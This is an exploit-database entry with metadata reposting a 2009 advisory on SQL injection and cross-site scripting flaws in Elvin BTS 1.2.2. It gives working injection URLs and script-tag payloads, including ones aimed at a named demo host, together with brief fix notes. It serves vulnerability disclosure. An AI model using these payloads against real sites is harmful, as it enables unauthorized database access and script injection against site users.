ID 1337DAY-ID-5604
Type zdt
Reporter 599eme Man
Modified 2009-08-03T00:00:00
Description
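Exploit for unknown platform in category web applications. The advisory below reports SQL injection through the id parameter of show_activity.php, and cross-site scripting through the component and priority parameters of buglist.php and the form fields of createaccount.php, in Elvin BTS 1.2.2.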
=========================================================
Elvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities
=========================================================
# [+] Elvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities
# [+] Software : Elvin BTS
# [+] Author : 599eme Man
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
# [+] Special : Moudi my Brozazaaaaaaaaaaaa
#
#[------------------------------------------------------------------------------------]
#
# [+] Vulnerabilities
#
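# [+] SQL injection (id parameter of show_activity.php)
#
#     The request below suggests the id value reaches the database query without
#     validation; binding it as a query parameter, or casting it to an integer
#     before use, closes this class of flaw.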
#
# - http://www.site.com/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--
#
# [+] Demo
#
# - http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--
#
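# [+] XSS (cross-site scripting)
#
#     The requests below suggest the component and priority values, and the
#     account form fields, are written back into the page without HTML encoding;
#     encoding them on output is the fix.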
#
# - http://www.site.com/buglist.php?component=[XSS/IFRAME/REDIRECTION]
#
# - http://www.site.com/buglist.php?priority=[XSS/IFRAME/REDIRECTION]
#
# - http://www.site.com/createaccount.php => Username : "'><script>alert('xss')</script>
# => E-mail : "'><script>alert('xss')</script>
# => Pass : "'><script>alert('xss')</script>
# => Confirm pass : "'><script>alert('xss')</script>
#
# [+] Demo
#
# - http://landfill.elvinbts.org/buglist.php?component=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
# - http://landfill.elvinbts.org/buglist.php?priority=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
# - http://landfill.elvinbts.org/createaccount.php
#
#
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################
# 0day.today [2018-02-16] #
{"published": "2009-08-03T00:00:00", "id": "1337DAY-ID-5604", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-02-16T03:14:18", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-16T03:14:18", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "lastseen": "2018-02-16T03:14:18", "edition": 2, "title": "Elvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities", "href": "https://0day.today/exploit/description/5604", "modified": "2009-08-03T00:00:00", "bulletinFamily": "exploit", "viewCount": 51, "cvelist": [], "sourceHref": "https://0day.today/exploit/5604", "references": [], "reporter": "599eme Man", "sourceData": "=========================================================\r\nElvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities\r\n=========================================================\r\n\r\n\r\n# [+] Elvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities\r\n# [+] Software : Elvin BTS\r\n# [+] Author : 599eme Man\r\n# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...\r\n# [+] Special : Moudi my Brozazaaaaaaaaaaaa\r\n#\r\n#[------------------------------------------------------------------------------------]\r\n# \r\n# [+] Vulnerabilities\r\n#\r\n#\t[+] SQL\r\n#\r\n#\t\t- http://www.site.com/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--\r\n#\t\t\r\n#\t\t\t[+] Demo\r\n#\r\n#\t\t\t\t- http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--\r\n#\r\n#\t[+] XSS\r\n#\r\n#\t\t- http://www.site.com/buglist.php?component=[XSS/IFRAME/REDIRECTION]\r\n#\r\n#\t\t- http://www.site.com/buglist.php?priority=[XSS/IFRAME/REDIRECTION]\r\n#\r\n#\t\t- http://www.site.com/createaccount.php => Username : \"'><script>alert('xss')</script>\r\n# \t\t\t\t\t\t\t=> E-mail : \"'><script>alert('xss')</script>\r\n# 
\t\t\t\t\t\t\t=> Pass : \"'><script>alert('xss')</script>\r\n# \t\t\t\t\t\t\t=> Confirm pass : \"'><script>alert('xss')</script>\r\n#\r\n#\t\t\t[+] Demo\r\n#\r\n#\t\t\t\t- http://landfill.elvinbts.org/buglist.php?component=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E\r\n#\r\n# \t\t\t\t- http://landfill.elvinbts.org/buglist.php?priority=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E\r\n#\r\n#\t\t\t\t- http://landfill.elvinbts.org/createaccount.php\r\n#\r\n#\r\n#\r\n#[------------------------------------------------------------------------------------]\r\n#\r\n#########################################################################################################\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-16] #"}
{}